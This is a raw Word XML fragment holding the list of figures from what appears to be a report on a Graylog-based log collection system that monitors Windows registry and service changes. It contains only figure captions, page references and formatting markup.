          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.10 Graylog servers and Elasticsearch servers deployed in Cluster mode.</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239538 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>35</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39" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.11 Example of a dashboard.</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239539 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</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0" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.12 Messages are processed in stream.</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239540 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>37</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1" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.1 Registry Monitor architecture diagram</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239541 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</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2" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.2 Mechanism for detecting change in registry</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239542 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>49</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3" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.3 Service Monitor Architecture</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239543 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>50</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4" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.4 NotifyServiceStatusChange and APC</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239544 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>53</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5" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.5 Distributed Log Collector Hardware architecture</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239545 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>55</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6" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.6 Centralized Log Storage System architecture</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239546 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>58</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7" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.7 Sentry is executed using Powershell and Shellscript</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239547 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>60</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8" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.1 Create an input for Graylog server using Beats framework.</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239548 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>88</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49" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.2 Graylog input channel for receiving data from DLCH via Filebeats</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239549 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>89</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0" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.3 Configure input and output channel for each DLCH’s collector</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239550 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>89</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1" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.4 Create Input channel for DLCH’s collector</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239551 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>90</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2" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.5 Create Output channel for DLCH’s collector</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239552 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>91</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3" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.6 Adding 2 Registry Value using Regedit</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239553 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>93</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4" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.7 Graylog capture Event for creating and deleting service</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239554 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>93</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5" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.8 Graylog event information in detail</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239555 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>94</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6" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.9 Modify registry name for experimenting.</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239556 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>95</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7" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.10 Graylog capture events that modify Registry Database</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239557 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>95</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8" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.11 Adding a Registry subkey and modifying subkey name.</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239558 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>96</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59" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.12 Graylog capture events that modify Subkey</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239559 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>96</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60" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4.13 Creating and deleting a Windows Service</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239560 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>97</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
